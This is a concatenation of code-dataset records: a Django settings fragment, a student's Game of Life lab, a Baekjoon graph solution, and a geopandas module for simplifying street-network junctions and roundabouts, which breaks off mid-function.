)\n\nEMAIL_HOST = 'localhost'\nEMAIL_PORT = 1025\n\nADMINS = (('Yevheniia', \"ZhenyaSmirnova@ukr.net\"), )\n\nLOGGING = {\n 'version': 1,\n 'formatters': {\n 'verbose': {\n 'format': '%(levelname)s %(asctime)s %(module)s %(funcName)s %(message)s'\n },\n 'simple': {\n 'format': '%(levelname)s %(message)s'\n },\n },\n 'loggers':\n {\n 'exhibition': {\n 'handlers': ['file_exhibition'],\n 'level': 'DEBUG',\n },\n 'collector': {\n 'handlers': ['file_collector'],\n 'level': 'DEBUG',\n },\n },\n 'handlers':\n {\n 'file_exhibition': {\n 'level': 'DEBUG',\n 'class': 'logging.FileHandler',\n 'filename': os.path.join(BASE_DIR, 'exhibition_logger.log'),\n 'formatter': 'simple'\n },\n 'file_collector': {\n 'level': 'WARNING',\n 'class': 'logging.FileHandler',\n 'filename': os.path.join(BASE_DIR, 'collector_logger.log'),\n 'formatter': 'verbose'\n },\n },\n}\ntry:\n from .local_settings import *\nexcept ImportError:\n pass\n","sub_path":"butterflies/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":4675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"99441275","text":"#\n# life.py - Game of Life lab\n#\n# Name:Michael Sanchez\n# Pledge:I pledge my honor that I have abided by the Stevens Honor System\n# PS: I did game of life in high school\n\nimport random\n\ndef createOneRow(width):\n \"\"\"Returns one row of zeros of width \"width\"... \n You should use this in your\n createBoard(width, height) function.\"\"\"\n row = []\n for col in range(width):\n row += [0]\n return row\n\ndef createBoard(row,col):\n '''creates a board, but backwards from the way you learned 3 years ago(rows being nested instead of cols)'''\n a=[]\n for c in range(col):\n a+=[[0]*row]\n return a\n\ndef printBoard(a):\n '''Prints the board'''\n for r in range(len(a)):\n s=\"\"\n for c in range(len(a[0])):\n s+=str(a[r][c])\n print(s)\n\ndef diagonalize(width,height):\n \"\"\" creates an empty board and then modifies it\n so that it has a diagonal strip of \"on\" cells.\"\"\"\n A = createBoard( width, height )\n for row in range(height):\n for col in range(width):\n if row == col:\n A[row][col] = 1\n else:\n A[row][col] = 0\n return A\ndef innerCells(row,col):\n '''makes all cells but border cells equal to 1'''\n a=createBoard(r,c)\n for r in range(len(a)):\n for c in range(len(a[0])):\n if not r==0 and not r==len(a)-1 and not c==0 and not c==len(a[0]):\n a[r][c]==1\n return a\n\ndef randomCells(row,col):\n '''makes each cell randomly 1 or 0'''\n a=createBoard(row,col)\n for r in range(len(a)):\n for c in range(len(a[0])):\n a[r][c]==random.choice([0,1])\n return a\n\ndef copy(a):\n '''copies a 2d list'''\n b=[]\n for r in a:\n b+=[r]\n return b\n\ndef innerReverse(a):\n '''reverses everything but the border'''\n b=copy(a)\n for r in range(len(a)):\n for c in range(len(a[0])):\n if not r==0 and not r==len(a)-1 and not c==0 and not c==len(a[0]):\n b[r][c]==int(not b[r][c])\n return b\n\ndef next_life_generation(a):\n '''returns next generation based off of the rules from conways game of life'''\n def testNeighbors(d):\n '''tests all 8 neighbors and returns result'''\n totalN=0\n for r in range(3):\n for c in range(3):\n if not(r==1 and c==1):\n totalN+=d[r][c]\n return 1 if totalN==3 else (1 if (totalN==2 and d[1][1]==1) else 0)\n b=copy(a)\n for r in range(1,len(a)-1):\n for c in range(1,len(a[0])-1):\n b[r][c]=testNeighbors(\\\n [[a[r-1][c-1],a[r-1][c],a[r-1][c+1]],\\\n [a[r][c-1],a[r][c],a[r][c+1]],\\\n [a[r+1][c-1],a[r+1][c],a[r+1][c+1]]])\n return b\n\n","sub_path":"life.py","file_name":"life.py","file_ext":"py","file_size_in_byte":2733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"2442804","text":"import sys\ninput = sys.stdin.readline\nsys.setrecursionlimit(1000000000)\n\nclass Node :\n def __init__(self, data) :\n self.data = data\n self.child = set()\n\nclass FriendMoney :\n def __init__(self) :\n self.N, self.M, self.K = map(int, input().rstrip().split(\" \"))\n self.money = list(map(int, input().rstrip().split(\" \")))\n self.friendDict = dict()\n for i in range(1, self.N+1) :\n self.friendDict[i] = Node(i)\n self.bfs = [0 for i in range(self.N+1)]\n \n def inputFriendRelation(self) :\n for _ in range(self.M) :\n a, b = map(int, input().split(\" \"))\n self.friendDict[b].child.add(self.friendDict[a])\n self.friendDict[a].child.add(self.friendDict[b])\n \n def checkFriends(self,temp,value) :\n result = value\n self.bfs[temp.data] = 1\n for i in temp.child :\n if self.bfs[i.data] == 1 :\n continue\n comp = self.checkFriends(i, result)\n if comp < result :\n result = comp\n return result\n \n def soluction(self) :\n total = self.K\n for i in range(1, 1+self.N) :\n if self.bfs[i] == 0 :\n pay = self.checkFriends(self.friendDict[i], self.money[i-1])\n total -= pay\n if total < 0 :\n return \"Oh no\"\n return self.K - total\n\nif __name__ == \"__main__\":\n print(\"Hello\")","sub_path":"back_joon/자료구조/back_joon_16562_친구비/back_joon_16562_ver2.py","file_name":"back_joon_16562_ver2.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"572668379","text":"import warnings\nwarnings.simplefilter(action='ignore')\n\nimport pandas as pd\nimport numpy as np\nimport geopandas as gpd\nimport math\nfrom math import sqrt\nfrom shapely.geometry import Point, LineString, Polygon, MultiPoint\nfrom shapely.ops import linemerge, nearest_points, split, polygonize_full, unary_union\n\npd.set_option('precision', 10)\npd.options.mode.chained_assignment = None\n\nimport statistics\nimport ast\nfrom .graph import nodes_degree\nfrom .utilities import center_line, merge_lines\nfrom .cleaning_network import clean_network, correct_edges\nfrom .angles import difference_angle_line_geometries, angle_line_geometries\n\ndef is_parallel(line_geometry_A, line_geometry_B, hard = False):\n \n difference_angle = difference_angle_line_geometries(line_geometry_A, line_geometry_B)\n if (difference_angle <= 30):\n return True\n \n line_coordsA = list(line_geometry_A.coords)\n line_coordsB = list(line_geometry_B.coords)\n if ((len(line_coordsA) == 2) | (len(line_coordsB) == 2)): \n return False\n \n if not hard:\n # remove first coordinates (A,B)\n line_geometry_A = LineString([coor for coor in line_coordsA[1:]])\n line_geometry_B = LineString([coor for coor in line_coordsB[1:]])\n difference_angle = difference_angle_line_geometries(line_geometry_A, line_geometry_B)\n if (difference_angle <= 20) & (difference_angle >= -20): \n return True\n \n # remove first (A) and last (B)\n line_geometry_B = LineString([coor for coor in line_coordsB[:-1]])\n difference_angle = difference_angle_line_geometries(line_geometry_A, line_geometry_B)\n if (difference_angle <= 20) & (difference_angle >= -20): \n return True\n \n # remove last (A) and first (B)\n line_geometry_A = LineString([coor for coor in line_coordsA[:-1]])\n line_geometry_B = LineString([coor for coor in line_coordsB[1:]])\n difference_angle = difference_angle_line_geometries(line_geometry_A, line_geometry_B)\n if (difference_angle <= 20) & (difference_angle >= -20): \n return True\n \n # remove last coordinates (A, B)\n line_geometry_A = LineString([coor for coor in line_coordsA[:-1]])\n line_geometry_B = LineString([coor for coor in line_coordsB[:-1]])\n difference_angle = difference_angle_line_geometries(line_geometry_A, line_geometry_B)\n if (difference_angle <= 20) & (difference_angle >= -20): \n return True\n \n if ((len(line_coordsA) == 3) | (len(line_coordsB) == 3)):\n return False\n line_geometry_A = LineString([coor for coor in line_coordsA[1:-1]])\n line_geometry_B = LineString([coor for coor in line_coordsB[1:-1]])\n difference_angle = difference_angle_line_geometries(line_geometry_A, line_geometry_B)\n if (difference_angle <= 20) & (difference_angle >= -20): \n return True\n \n return False\n \ndef is_continuation(ix_lineA, ix_lineB, edges_gdf):\n\n nameA = edges_gdf.loc[ix_lineA]['name']\n nameB = edges_gdf.loc[ix_lineB]['name']\n line_geometry_A = edges_gdf.loc[ix_lineA]['geometry']\n line_geometry_B = edges_gdf.loc[ix_lineB]['geometry']\n if is_parallel(line_geometry_A, line_geometry_B, hard = True): \n return True\n return ((nameA == nameB) & (is_parallel(line_geometry_A, line_geometry_B, hard = False)))\n\ndef simplify_dual_lines_junctions(nodes_gdf, edges_gdf, max_difference_length = 0.40, max_distance_between_lines = 30):\n\n \"\"\"\n This function simplifies parallel or semi-parallel lines - which may represent dual carriageway roads.\n In this case, the roads originate and terminate from the same pair of nodes:\n - An uninterrupted (no intersecting roads along) street segment A is examined\n - The lines originating from its vertexes (u, v) are assesed.\n - Lines which are not parallel are disregarded.\n - The parallel lines are kept and their natural continuations are examined, again in relation to segment A.\n This line can originate for example in segment A's \"u\", traverse a certain amount of intermediate nodes and reach segment A's \"v\".\n - Thus, road B, if existing, is composed of continuous sub-segments parallel to segment A. The geometry obtained by merging road B continuous segments starts either in\n segmentA's \"u\" or \"v\" and terminates in either \"v\" or \"u\".\n - If such line is found a center line geometry is obtained.\n \n Interesecting roads are interpolated in the simplified road-center-line resulting geometry.\n \n If the researcher has assigned specific values to edges (e.g. densities of pedestrians, vehicular traffic or similar) please allow the function to combine\n the relative densities values during the cleaning process.\n \n Two parameters depend on street morphology and the user assessment:\n - max_difference_length: indicate here the max difference in length between the two lines (segmentA's geometry and roadB's). \n Specify the max percente difference in float. e.g. 40% --> 0.40\n - max_distance_between_lines: float\n \n A new dataframe is returned with the simplified geometries.\n \n Parameters\n ----------\n nodes_gdf: Point GeoDataFrame\n edges_gdf: LineString GeoDataFrames\n max_difference_length: float\n max_distance_between_lines: float\n \n Returns\n -------\n GeoDataFrames\n \"\"\"\n \n nodes_gdf.index, edges_gdf.index = nodes_gdf.nodeID, edges_gdf.edgeID\n nodes_gdf.index.name, edges_gdf.index.name = None, None\n nodes_gdf, edges_gdf = nodes_gdf.copy(), edges_gdf.copy()\n \n edges_gdf['name'][edges_gdf.name.isnull()] = None\n edges_gdf = edges_gdf.where(pd.notnull(edges_gdf), None)\n original_edges_gdf = edges_gdf.copy()\n \n ix_geo = edges_gdf.columns.get_loc(\"geometry\")+1 \n ix_u, ix_v = edges_gdf.columns.get_loc(\"u\")+1, edges_gdf.columns.get_loc(\"v\")+1\n ix_name = edges_gdf.columns.get_loc(\"name\")+1\n processed = []\n \n # the original geometries and edges are iterated and examined;\n for row in original_edges_gdf.itertuples():\n if row.Index in processed: \n continue \n \n for r in [ix_u, ix_v]:\n found = False\n possible_matches = original_edges_gdf[(original_edges_gdf['u'] == row[r]) | (original_edges_gdf['v'] == row[r])].copy()\n possible_matches.drop(row.Index, axis = 0, inplace = True)\n possible_matches = possible_matches[~possible_matches.index.isin(processed)]\n \n possible_matches = possible_matches[possible_matches.geometry.length < row[ix_geo].length]\n possible_matches['continuation'] = False\n possible_matches['continuation'] = possible_matches.apply(lambda c: is_continuation(row.Index, c.name, edges_gdf), axis = 1)\n possible_mathces = possible_matches[possible_matches.continuation]\n \n if len(possible_matches) == 0: \n continue\n if r == ix_u: \n direction = 'v'\n to_reach = row[ix_v] \n else: \n direction = 'u'\n to_reach = row[ix_u] \n \n for connector in possible_matches.itertuples():\n \n if connector[ix_u] == row[r]: \n search = connector[ix_v] \n else: search = connector[ix_u]\n\n nodes_traversed = [search]\n lines_traversed = [connector[ix_geo]]\n lines = [connector.Index]\n next_line = False # to determine when moving to the next candidate\n last_line = connector.Index\n\n while (not found) & (not next_line):\n # look for a new possible set of connectors\n next_possible_matches = original_edges_gdf[(original_edges_gdf['u'] == search) | (original_edges_gdf['v'] == search)].copy() \n next_possible_matches.drop([last_line, row.Index], axis = 0, inplace = True, errors = 'ignore') # remove the previous lines, in case\n next_possible_matches = next_possible_matches[~next_possible_matches.index.isin(processed)]\n\n for other_connector in next_possible_matches.itertuples():\n if not is_continuation(last_line, other_connector.Index, edges_gdf): \n next_possible_matches.drop(other_connector.Index, axis = 0, inplace = True)\n\n if len(next_possible_matches) == 0: \n next_line = True\n break\n\n if len(next_possible_matches) > 1: # if more than one candidate\n next_possible_matches['angle'] = 0.0\n for candidate in next_possible_matches.itertuples():\n angle = angle_line_geometries(edges_gdf.loc[last_line].geometry, candidate[ix_geo], deflection = True, degree = True)\n next_possible_matches.at[candidate.Index, 'angle'] = angle\n next_possible_matches.sort_values(by = 'angle', ascending = True, inplace = True) \n \n # take the best candidate's attribute\n u, v = next_possible_matches.iloc[0]['u'], next_possible_matches.iloc[0]['v']\n\n if u == search: \n search = next_possible_matches.iloc[0]['v']\n other = next_possible_matches.iloc[0]['u']\n else: \n search = next_possible_matches.iloc[0]['u']\n other = next_possible_matches.iloc[0]['v']\n\n distA = nodes_gdf.loc[search].geometry.distance(nodes_gdf.loc[to_reach].geometry)\n distB = nodes_gdf.loc[other].geometry.distance(nodes_gdf.loc[to_reach].geometry)\n\n if (search in nodes_traversed) | (distB < distA): \n next_line = True\n continue\n elif search == to_reach:\n lines_traversed.append(next_possible_matches.iloc[0].geometry)\n lines.append(next_possible_matches.iloc[0].name)\n found = True\n break\n else: \n nodes_traversed.append(search)\n lines_traversed.append(next_possible_matches.iloc[0].geometry)\n lines.append(next_possible_matches.iloc[0].name)\n last_line = next_possible_matches.iloc[0].name\n\n if next_line: \n continue\n else: break\n\n if not found: \n continue # no parallel dual lines at this node\n u, v, geo = row[ix_u], row[ix_v], row[ix_geo] \n merged_line = merge_lines(lines_traversed)\n \n # check whether it makes sense to merge or not\n if (geo.length*(max_difference_length+1) < merged_line.length) | (geo.length > merged_line.length*(max_difference_length+1)): \n continue\n if (geo.centroid.distance(merged_line.centroid) > max_distance_between_lines):\n continue\n \n # obtaining center line\n cl = center_line(geo, merged_line)\n processed = processed + lines\n processed.append(row.Index)\n if (\"pedestrian\" in edges_gdf.columns) & (len(edges_gdf.loc[lines][edges_gdf.pedestrian == 1]) > 0):\n edges_gdf.at[row.Index, 'pedestrian'] = 1\n if direction == 'u': \n nodes_traversed.reverse()\n # interpolate nodes encountered along the parallel lines\n interpolate_on_centre_line(row.Index, cl, nodes_gdf, edges_gdf, u, v, nodes_traversed)\n\n edges_gdf.drop(lines, axis = 0, inplace = True) \n break\n \n # correct the coordinates and clean the network\n edges_gdf = correct_edges(nodes_gdf, edges_gdf)\n nodes_gdf, edges_gdf = clean_network(nodes_gdf, edges_gdf, dead_ends = True, remove_disconnected_islands = False, same_uv_edges = True, self_loops = True)\n \n return(nodes_gdf, edges_gdf)\n\ndef simplify_complex_junctions(nodes_gdf, edges_gdf):\n \n \"\"\"\n This function simplifies complex junctions as trinagular-like junctions formed mainly by secondary links.\n The junction may be as well represented by one node rather than, for example, three nodes. \n \n If the researcher has assigned specific values to edges (e.g. densities of pedestrians, vehicular traffic or similar) please allow the function to combine\n the relative densities values during the cleaning process.\n \n The function takes a node and check whether the intersecting edges give shape to a triangular-cyclic junction.\n \n A new dataframe with the simplified geometries is returned.\n \n Parameters\n ----------\n nodes_gdf: Point GeoDataFrame\n edges_gdf: LineString GeoDataFrames\n \n Returns\n -------\n GeoDataFrames\n \"\"\"\n \n nodes_gdf.index, edges_gdf.index = nodes_gdf.nodeID, edges_gdf.edgeID\n nodes_gdf.index.name, edges_gdf.index.name = None, None\n nodes_gdf, edges_gdf = nodes_gdf.copy(), edges_gdf.copy()\n \n edges_gdf['name'][edges_gdf.name.isnull()] = None\n original_edges_gdf = edges_gdf.copy()\n \n ix_geo = edges_gdf.columns.get_loc(\"geometry\")+1 \n ix_u, ix_v = edges_gdf.columns.get_loc(\"u\")+1, edges_gdf.columns.get_loc(\"v\")+1\n ix_name = edges_gdf.columns.get_loc(\"name\")+1\n processed = []\n \n for node in nodes_gdf.itertuples():\n tmp = edges_gdf[(edges_gdf['u'] == node.Index) | (edges_gdf['v'] == node.Index)].copy()\n found = False\n \n # take one of these lines and examine its relationship with the others at the same junction\n for row in tmp.itertuples():\n if row.Index in processed: \n continue\n\n for other in tmp.itertuples():\n if (row.Index == other.Index) | (other.Index in processed): \n continue\n \n # determining the relationship\n if row[ix_u] == other[ix_u]: # the last one is 'v'\n v1, v2 = ix_v, ix_v\n last_vertex, code = -1, 'v'\n \n elif row[ix_u] == other[ix_v]: # the last one is 'u'\n v1, v2 = ix_v, ix_u\n last_vertex, code = -1, 'v'\n \n elif row[ix_v] == other[ix_u]: # the last one is 'u'\n v1, v2 = ix_u, ix_v\n last_vertex, code = 0, 'u'\n \n elif row[ix_v] == other[ix_v]: # the last one is 'u'\n v1, v2 = ix_u, ix_u\n last_vertex, code = 0, 'u'\n else: continue\n \n # look for the connector segment\n possible_matches = edges_gdf[((edges_gdf['u'] == row[v1]) & (edges_gdf['v'] == other[v2])) | ((edges_gdf['u'] == other[v2]) & (edges_gdf['v'] == row[v1]))].copy()\n if len(possible_matches) == 0: \n continue\n connector = possible_matches.iloc[0]\n \n u, v, u_other, v_other = row[ix_u], row[ix_v], other[ix_u], other[ix_v]\n geo, other_geometry, connector_geometry = row[ix_geo], other[ix_geo], connector.geometry\n if any(i > 100 for i in [geo.length, other_geometry.length, connector_geometry.length]): \n break # segments are too long\n \n diff_A = abs(geo.length - other_geometry.length) \n diff_B = abs(geo.length - connector_geometry.length)\n diff_C = abs(other_geometry.length- connector_geometry.length)\n if (diff_B < diff_A) | (diff_C < diff_A): \n continue \n if (diff_A > geo.length*0.75) | (diff_A > other_geometry.length*0.75):\n continue\n if (connector_geometry.length > (geo.length + other_geometry.length)*1.25): \n continue \n if (diff_A > geo.length*0.25) | (diff_A > other_geometry.length*0.25): \n continue\n \n if \"pedestrian\" in edges_gdf.columns: \n if edges_gdf.loc[other.Index]['pedestrian'] == 1: \n edges_gdf.at[row.Index, 'pedestrian'] = 1\n \n # drop the other line\n edges_gdf.drop(other.Index, axis = 0, inplace = True)\n cl = center_line(geo, other_geometry)\n intersection = cl.intersection(connector_geometry)\n ix_node = nodes_gdf.index.max()+1\n nodes_gdf.loc[ix_node] = nodes_gdf.loc[row[v1]] # copy attributes\n nodes_gdf.at[ix_node, 'nodeID'] = ix_node\n \n ix_edge = edges_gdf.index.max()+1\n edges_gdf.loc[ix_edge] = edges_gdf.loc[connector.name]\n edges_gdf.at[ix_edge, 'edgeID'] = ix_edge\n edges_gdf.at[row.Index, code] = ix_node\n\n if intersection.geom_type == 'Point': # check if the center line reaches the connector\n last = intersection.coords[0]\n line = split_line_at_interpolation(intersection, cl)[0]\n nodes_gdf.at[ix_node, 'geometry'] = intersection\n \n if code == 'u': \n edges_gdf.at[row.Index,'geometry'] = line[1]\n else: edges_gdf.at[row.Index,'geometry'] = line[0]\n \n line = split_line_at_interpolation(intersection, connector_geometry)[0]\n edges_gdf.at[connector.name, 'geometry'] = line[0]\n edges_gdf.at[connector.name, 'v'] = ix_node\n edges_gdf.at[ix_edge, 'u'] = ix_node\n edges_gdf.at[ix_edge, 'geometry'] = line[1]\n\n else: # no intersection, extend lines towards center line\n last = list(cl.coords)[last_vertex]\n nodes_gdf.at[ix_node, 'geometry'] = Point(last)\n edges_gdf.at[row.Index,'geometry'] = cl\n\n line_geometry_A = LineString([coor for coor in [connector_geometry.coords[0], last]])\n line_geometry_B = LineString([coor for coor in [last, connector_geometry.coords[-1]]])\n edges_gdf.at[connector.name, 'geometry'] = line_geometry_A\n edges_gdf.at[ix_edge, 'geometry'] = line_geometry_B\n edges_gdf.at[connector.name, 'v'] = ix_node\n edges_gdf.at[ix_edge, 'u'] = ix_node\n \n processed = processed + [row.Index, other.Index]\n nodes_gdf.at[ix_node, 'x'] = last[0]\n nodes_gdf.at[ix_node, 'y'] = last[1]\n \n found = True\n break\n \n if found: \n break\n \n edges_gdf = correct_edges(nodes_gdf, edges_gdf)\n nodes_gdf, edges_gdf = clean_network(nodes_gdf, edges_gdf, dead_ends = True, remove_disconnected_islands = False, same_uv_edges = True, self_loops = True) \n return(nodes_gdf, edges_gdf)\n\n\n\ndef dissolve_roundabouts(nodes_gdf, edges_gdf, max_length_segment = 80, angle_tolerance = 40):\n\n nodes_gdf.index, edges_gdf.index = nodes_gdf.nodeID, edges_gdf.edgeID\n nodes_gdf.index.name, edges_gdf.index.name = None, None\n nodes_gdf, edges_gdf = nodes_gdf.copy(), edges_gdf.copy()\n \n ix_geo = edges_gdf.columns.get_loc(\"geometry\")+1 \n ix_u, ix_v = edges_gdf.columns.get_loc(\"u\")+1, edges_gdf.columns.get_loc(\"v\")+1\n\n processed_segments = []\n processed_nodes = []\n \n # editing the ones which only connect three edges\n to_edit = {k: v for k, v in nodes_degree(edges_gdf).items() if v == 3}\n if len(to_edit) == 0: \n return(nodes_gdf, edges_gdf)\n to_edit_gdf = nodes_gdf[nodes_gdf.nodeID.isin(list(to_edit.keys()))]\n \n \n for node in to_edit_gdf.itertuples():\n\n if node in processed_nodes: \n continue\n tmp = edges_gdf[(edges_gdf['u'] == node.Index) | (edges_gdf['v'] == node.Index)].copy()\n found = False\n not_a_roundabout = False\n \n # take one of these lines and examine its relationship with the others at the same junction\n for row in tmp.itertuples():\n if row[ix_geo].length > max_length_segment: \n continue #too long for being a roundabout segment\n sequence_nodes = [node.Index]\n sequence_segments = [row.Index]\n if row.Index in processed_segments: \n continue\n \n if row[ix_u] == node.Index: \n last_vertex = row[ix_v]\n else: last_vertex = row[ix_u]\n \n sequence_nodes.append(last_vertex)\n segment = row\n distance = 0\n second_candidate = False\n \n while not found:\n if distance >= 400: \n break # too much traversed distance for a roundabout\n if last_vertex in processed_nodes: # the node has been dissolved already\n if not second_candidate: \n break\n distance -= segment[ix_geo].length\n segment = sc\n distance += segment[ix_geo].length\n sequence_segments[-1] = segment[0]\n last_vertex = sc_last_vertex\n sequence_nodes[-1] = sc_last_vertex\n second_candidate = False\n continue\n \n possible_connectors = edges_gdf[(edges_gdf['u'] == last_vertex) | (edges_gdf['v'] == last_vertex)].copy()\n for connector in possible_connectors.itertuples():\n \n if (segment[0] == connector.Index) | (connector.Index in processed_segments): \n possible_connectors.drop(connector.Index, axis = 0, inplace = True)\n elif connector[ix_geo].length > max_length_segment: \n possible_connectors.drop(connector.Index, axis = 0, inplace = True)\n else: \n angle = angle_line_geometries(segment[ix_geo], connector[ix_geo], angular_change = True, degree = True)\n if angle > angle_tolerance: \n possible_connectors.drop(connector.Index, axis = 0, inplace = True)\n else: possible_connectors.at[connector.Index, 'angle'] = angle\n \n if (len(possible_connectors) == 0) | (last_vertex in processed_nodes):\n if not second_candidate: \n break\n else:\n distance -= segment[ix_geo].length\n segment = sc\n distance += segment[ix_geo].length\n sequence_segments[-1] = segment[0]\n last_vertex = sc_last_vertex\n sequence_nodes[-1] = sc_last_vertex\n second_candidate = False\n continue\n\n else: possible_connectors.sort_values(by = 'angle', ascending = True, inplace = True) \n \n segment = list(possible_connectors.iloc[0])\n segment.insert(0, possible_connectors.iloc[0].name)\n \n if len(possible_connectors) > 1:\n sc = list(possible_connectors.iloc[1])\n sc.insert(0, possible_connectors.iloc[1].name)\n second_candidate = True\n if sc[ix_u] == last_vertex:\n sc_last_vertex = sc[ix_v]\n else: sc_last_vertex = sc[ix_u]\n \n if segment[ix_u] == last_vertex:\n last_vertex = segment[ix_v]\n else: last_vertex = segment[ix_u]\n sequence_nodes.append(last_vertex)\n sequence_segments.append(segment[0]) \n distance += segment[ix_geo].length\n \n if last_vertex == node.Index:\n lm = linemerge(edges_gdf.loc[i].geometry for i in sequence_segments)\n roundabout = polygonize_full(lm)[0]\n if len(roundabout) == 0:\n not_a_roundabout = True\n break\n \n centroid = roundabout.centroid\n distances = [nodes_gdf.loc[i].geometry.distance(centroid) for i in sequence_nodes]\n shortest, longest, mean = min(distances), max(distances), statistics.mean(distances) \n if (shortest < mean * 0.80) | (longest > mean * 1.20): \n not_a_roundabout = True\n break\n\n found = True\n new_index = max(nodes_gdf.index)+1\n\n nodes_gdf.loc[new_index] = nodes_gdf.loc[node.Index]\n nodes_gdf.at[new_index,'nodeID'] = new_index\n nodes_gdf.at[new_index,'geometry'] = centroid\n nodes_gdf.at[new_index,'x'] = centroid.coords[0][0]\n nodes_gdf.at[new_index,'y'] = centroid.coords[0][1]\n processed_segments = processed_segments + sequence_segments\n processed_nodes = processed_nodes + sequence_nodes + [new_index]\n edges_gdf.loc[edges_gdf['u'].isin(sequence_nodes), 'u'] = new_index \n edges_gdf.loc[edges_gdf['v'].isin(sequence_nodes), 'v'] = new_index \n nodes_gdf.drop(sequence_nodes, axis = 0, inplace = True)\n edges_gdf.drop(sequence_segments, axis = 0, inplace = True) \n if not_a_roundabout:\n break\n if found: \n break\n \n edges_gdf = correct_edges(nodes_gdf, edges_gdf)\n nodes_gdf, edges_gdf = clean_network(nodes_gdf, edges_gdf, dead_ends = True, remove_disconnected_islands = False, same_uv_edges = True, self_loops = True) \n \n \n return nodes_gdf, edges_gdf\n \n\ndef identify_clusters(nodes_gdf, edges_gdf, radius = 10): \n \n \"\"\"\n This function simplifies complex junctions as trinagular-like junctions formed mainly by secondary links.\n The junction may be as well represented by one node rather than, for example three nodes. \n \n The function takes a node and check whether the intersecting edges give shape to a triangular-cyclic junction.\n \n A new dataframe with the simplified geometries is returned.\n \n Parameters\n ----------\n nodes_gdf: Point GeoDataFrame\n edges_gdf: LineString GeoDataFrames\n \n Returns\n -------\n GeoDataFrames\n \"\"\" \n \n nodes_gdf.index, edges_gdf.index = nodes_gdf.nodeID, edges_gdf.edgeID\n nodes_gdf.index.name, edges_gdf.index.name = None, None\n nodes_gdf, edges_gdf = nodes_gdf.copy(), edges_gdf.copy()\n \n to_ignore = {k: v for k, v in nodes_degree(edges_gdf).items() if v == 1}\n tmp_nodes_gdf = nodes_gdf[~nodes_gdf.nodeID.isin(list(to_ignore.keys()))].copy() #ignoring dead-ends\n buffered_nodes = tmp_nodes_gdf.buffer(radius).unary_union\n if isinstance(buffered_nodes, Polygon): \n buffered_nodes = [buffered_nodes]\n \n buffered_nodes_geoS = gpd.GeoSeries(list(buffered_nodes))\n buffered_nodes_df = pd.concat([buffered_nodes_geoS.rename('geometry'), pd.Series(buffered_nodes_geoS.index).rename('clusterID')], axis=1)\n\n buffered_nodes_gdf = gpd.GeoDataFrame(buffered_nodes_df, geometry = buffered_nodes_df.geometry)\n buffered_nodes_gdf['area']= buffered_nodes_gdf['geometry'].area\n buffered_nodes_gdf['centroid'] = buffered_nodes_gdf.geometry.centroid\n \n clusters_gdf = buffered_nodes_gdf[buffered_nodes_gdf[\"area\"] > (radius*radius*3.14159)]\n clusters_gdf['x'], clusters_gdf['y'] = (clusters_gdf.geometry.centroid.x, clusters_gdf.geometry.centroid.y)\n clusters_gdf.index += nodes_gdf.index.max()+1\n clusters_gdf['clusterID'] = clusters_gdf.index\n \n # set cluster column values\n nodes_gdf[\"cluster\"] = None\n nodes_gdf[\"cluster\"] = nodes_gdf.apply(lambda row: _assign_cluster_nodes(row[\"geometry\"], clusters_gdf), axis = 1)\n nodes_gdf = nodes_gdf.where(pd.notnull(nodes_gdf), None)\n nodes_gdf.loc[nodes_gdf.nodeID.isin(list(to_ignore.keys())), \"cluster\"] = None\n \n clusters_counts = dict(nodes_gdf['cluster'].value_counts())\n clusters_gdf['degree'] = 0\n clusters_gdf['degree'] = clusters_gdf['clusterID'].map(clusters_counts)\n \n geometry = clusters_gdf['centroid']\n data = clusters_gdf.drop(['centroid', 'geometry'], axis=1)\n clusters_gdf = gpd.GeoDataFrame(data, crs= nodes_gdf.crs, geometry=geometry)\n edges_gdf = _assign_cluster_edges(nodes_gdf, edges_gdf, clusters_gdf)\n \n return(nodes_gdf, edges_gdf, clusters_gdf)\n \ndef _assign_cluster_nodes(node_geometry, clusters_gdf): #ok\n \n ix_geo = clusters_gdf.columns.get_loc(\"geometry\")+1\n ix_cluster = clusters_gdf.columns.get_loc(\"clusterID\")+1\n \n tmp = clusters_gdf[clusters_gdf[\"geometry\"].intersects(node_geometry.buffer(1))]\n if len(tmp) == 0: \n return None\n for cluster in tmp.itertuples():\n if node_geometry.within(cluster[ix_geo]): \n return int(cluster[ix_cluster])\n\ndef _assign_cluster_edges(nodes_gdf, edges_gdf, clusters_gdf):\n \n nodes_gdf.set_index('nodeID', drop = False, append = False, inplace = True)\n nodes_gdf.index.name = None\n \n edges_gdf.drop(['nodeID_x', 'nodeID_y','clus_uR', 'clus_vR', 'clus_u', 'clus_v'], axis = 1, inplace = True, errors = 'ignore')\n edges_gdf = pd.merge(edges_gdf, nodes_gdf[['cluster', 'nodeID']], how = 'left', left_on= \"u\", right_on = \"nodeID\")\n edges_gdf = edges_gdf.rename(columns = {'cluster':'clus_u'})\n edges_gdf = pd.merge(edges_gdf, nodes_gdf[['cluster', 'nodeID']], how = 'left', left_on= \"v\", right_on = \"nodeID\")\n edges_gdf = edges_gdf.rename(columns = {'cluster':'clus_v'}) \n edges_gdf.set_index('edgeID', drop = False, append = False, inplace = True)\n edges_gdf.index.name = None\n\n edges_gdf['clus_uR'], edges_gdf['clus_vR'] = None, None\n ix_clus_u, ix_clus_v = edges_gdf.columns.get_loc(\"clus_u\")+1, edges_gdf.columns.get_loc(\"clus_v\")+1\n ix_clus_uR, ix_clus_vR = edges_gdf.columns.get_loc(\"clus_uR\")+1, edges_gdf.columns.get_loc(\"clus_vR\")+1\n \n # assigning cluster\n tmp = edges_gdf[(edges_gdf['clus_u'].isnull())].copy()\n edges_gdf['clus_uR'] = tmp.apply(lambda row: indirect_cluster(nodes_gdf, edges_gdf, clusters_gdf, row['edgeID'],\n 'u')[0], axis = 1)\n tmp = edges_gdf[(edges_gdf['clus_v'].isnull())].copy()\n edges_gdf['clus_vR'] = tmp.apply(lambda row: indirect_cluster(nodes_gdf, edges_gdf, clusters_gdf, row['edgeID'],\n 'v')[0], axis = 1)\n edges_gdf = edges_gdf.where(pd.notnull(edges_gdf), None)\n edges_gdf.drop(['nodeID_x', 'nodeID_y'], axis = 1, inplace = True, errors = 'ignore') \n return(edges_gdf)\n \ndef indirect_cluster(nodes_gdf, edges_gdf, clusters_gdf, ix_line, search_dir, specific_cluster = False, desired_cluster = None):\n \n 